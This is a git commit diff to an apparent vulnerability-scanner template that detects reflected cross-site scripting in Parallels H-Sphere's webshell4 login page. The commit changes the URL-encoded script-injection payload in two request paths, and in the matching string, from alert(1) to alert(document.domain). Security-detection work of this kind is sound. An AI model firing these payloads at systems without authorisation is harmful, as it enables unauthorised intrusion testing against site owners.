Update parallels-hsphere-xss.yaml
parent
4c862b96cf
commit
d7e182c693
|
@ -16,8 +16,8 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/webshell4/login.php?err=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/webshell4/login.php?err=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
- '{{BaseURL}}/webshell4/login.php?login=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/webshell4/login.php?login=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
|
@ -25,7 +25,7 @@ requests:
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- 'value="\"><script>alert(1)</script>'
|
- 'value="\"><script>alert(document.domain)</script>'
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: header
|
part: header
|
||||||
|
|
Loading…
Reference in New Issue